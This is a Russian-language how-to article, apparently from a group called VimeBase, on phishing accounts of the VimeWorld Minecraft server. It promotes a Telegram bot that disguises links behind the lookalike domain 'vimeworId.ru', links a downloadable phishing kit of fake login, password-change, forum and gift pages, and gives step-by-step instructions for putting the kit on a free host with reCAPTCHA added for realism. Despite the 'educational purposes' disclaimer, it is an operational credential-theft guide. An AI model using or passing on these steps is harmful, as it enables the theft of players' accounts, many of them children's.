Фишинг VimeWorld

Данная статья написана в ознакомительных целях. Мы не призываем вас ни к каким действиям. Все персонажи вымышленные, а действия описанные ниже постановка.

Пролог

Судя по надписи выше, вы скорее всего уже могли догадаться, что речь в этот раз пойдет о чем-то серьезном.

Несколько годиков назад была очень популярна тема с фишингом на VimeWorld. Дети создавали сотни сайтов каждый день, кидали ссылки своим друзьям и радовались когда их заветная жертва оставила там свои данные.

Все доходило до того, что начали появляться целые проекты по фишингу, в которых был так же и вайм. После регистрации вам была доступна ссылка, и все логи приходили в эту панель.

Время идет, мир меняется. На старые способы уже вряд ли кто-то "клюнет".
Поэтому хакеры постоянно придумывают новые способы атак.

Сегодня мы расскажем вам о новом витке в фишинге вайма, покажем как это все можно было бы установить и настроить.

Статья подойдет как для новичков в этом деле, так и для людей, которые в этом шарят.

Глава 1 - Сюрприз

Хочется начать с небольшого сюрприза от нас.

Да, мы подготовили вам небольшой подарок, он называется Ссылочник VimeWorld, и найти вы его сможете по адресу:https://t.me/vimelinkbot

Что же это такое спросите вы?

Это бот, который умеет превращать ваши ссылки в ссылке максимально похожие на адреса вайма.

Шаги:

• Отправляете боту любую ссылку.

• Выбираете интересующий вас адрес (или же как его ещё называют домен).

• Далее нужно выбрать путь на сайте, то что идет после домена. Корень сайта это значит что ссылка не будет иметь лишних слов, а будет вести прямо на сам сайт.

• Вот и все! Ссылка вашей мечты готова.

Что особенного в этих ссылках?

Бот хоть и предлагает вам некоторую кастомизацию ссылок, но вы можете и сами делать какие угодно ссылки.

Возьмем за пример ссылку, которую нам сгенерировал бот: https://cp.vimeworId.ru/login/MdEtSKv

Слово login тут можно заменить любым своим словом.Например: https://cp.vimeworId.ru/banan/MdEtSKvИли же: https://cp.vimeworId.ru/hypixel/MdEtSKv

Если вам мало изменения этого параметра, то вы можете добавить GET запрос. Он выглядит так: https://cp.vimeworId.ru/login/?ref=MdEtSKvGET запрос тут это ?ref=
Это тоже можно изменять, например: https://cp.vimeworId.ru/login/?ban=MdEtSKv

Так же вы можете комбинировать первый и второй варианты, чтобы добиться максимального эффекта.
Например: https://cp.vimeworId.ru/okssi/?ban=MdEtSKv

Этого бота можно использовать как во вред кому-то, так и в добром русле.

Сейчас, конечно же, мы поговорим о втором варианте, применение первого вы придумаете уже сами.

Если кто не понял, то ссылки сокращаются через домен vimeworid.ru с заглавной буквой I, вместо l. Это почти не заметно, если отправлять эти ссылки другим людям во всяких мессенджерах и соцсетях.

Так же хочется отметить, что мессенджеры, не видят вашей исходной ссылки, они думают что там пустая страница.

Глава 2 - В атаку

Сейчас мы поговорим о возможности использования описанного в первой главе способа сокращения ссылок.

Мы взяли за основу один известный скрипт фишинга VimeWorld и доработали некоторым образом.

Вот что там есть:

Все эти скрипты связаны между собой воедино и представляют один цельный организм. Все ссылки ведут с одного скрипта на другой, чтобы все выглядело максимально естественно.

То есть, у вас не получится просто так взять и отделить например форму входа от остального сайта, поэтому стоит использовать весь его целиком.

Скачивание архива

Архив вы сможете найти в нашем телеграмм канале: https://t.me/vbfiles

Первым делом вам нужно поместить все файлы из архива в какую-нибудь папку.

В архиве находится папка src для тех, кто привык использовать Filezilla.
И src.zip для загрузки через веб панель хостинга, как будет описано ниже.

Установка на хостинг

Вы можете использовать абсолютно любой хостинг, хоть платный хоть бесплатный, если вы в этом хоть немного разбираетесь.

Мы же рассмотрим все это на примере хостинга Sprinthost.
Все поэтапно разберем, чтобы каждый смог повторить увиденное.
Вы же можете использовать и 000webhost.com, там все примерно будет так же.

Сайт: https://free.sprinthost.ru/

Нажимаем на эту большую красную кнопку.

Входим через наши соц сеточки.

Ждем пару минут, когда нам активируют аккаунт...

Ну вот и все собственно.

Из-за использования ВКонтакте в качестве входа, меня просят указать почту.
(на почту кстати пришли данные для подключения к FTP)

После регистрации переходим по ссылке: https://cp.sprinthost.ru/customer/sites/list

Тут мы видим какой будет адрес нашего сайта.
Но это нам пока не нужно, можете просто открыть его в новой вкладке и идти загружать все нужные файлы.

Переходим по ссылке: https://cp.sprinthost.ru/customer/files/manager
Открывается файловый менеджер в который нам нужно залить наши данные.

Идем по такому пути:

1. /domains:

2. /ваш сайт

3. /public_html:

Кликаем на иконку загрузки файла:

И загружаем src.zip из нашего архива.

Выделяем наш загруженный архив и нажимаем распаковать:

После успешного извлечения вам нужно будет только настроить ваш скрипт в config.php

Самое главное, это конечно подключить капчу, чтобы было максимально правдоподобно.

Переходим по ссылке: https://g.co/recaptcha/v3
И делаем все как на скриншоте:

В 2 местах вам нужно будет указать ссылку на ваш сайт без https:// и /, так же как это было указано в панели клиента на хостинге (https://cp.sprinthost.ru/customer/sites/list).

Берем только первый ключ:

Возвращаемся на хостинг к файлам и кликаем по config.php

И изменяем параметр $captcha_key на тот что вам выдали.

Сохраняем и выходим.

Ну и все собственно, ваш сайт уже работает.

Все ссылки на скрипты:

вашсайт/login/ - обычная форма входа

вашсайт/password/ - смена пароля

вашсайт/referal/ - реферальная система

вашсайт/forum/ - форум

вашсайт/gift/ - подарок от администрации

Теперь нужный вам скрипт можно сократить через того бота, описанного в первой главе и кинуть своему другу, чтобы его удивить.

Все логи сохраняются в файл database.php

Финал

После сокращения ссылки через бота, ваш фишинг станет практически незаметным. Но стоит заметить, что лучше использовать хостинги с возможностью подключения сертификата SSL и сменой адреса, чтобы все выглядело максимально похоже, мы лишь показали как это делать на конкретном примере.

Поэтому, смотрите внимательней куда переходите, и какие данные вы вводите.

Лучше 1 раз внимательно посмотреть, чем потом 100 раз пытаться вернуть свой аккаунт.

Статья подготовлена командой VimeBase

Наш Telegram: https://t.me/basevw
Файлы: https://t.me/vbfiles
Тот самый бот: https://t.me/vimelinkbot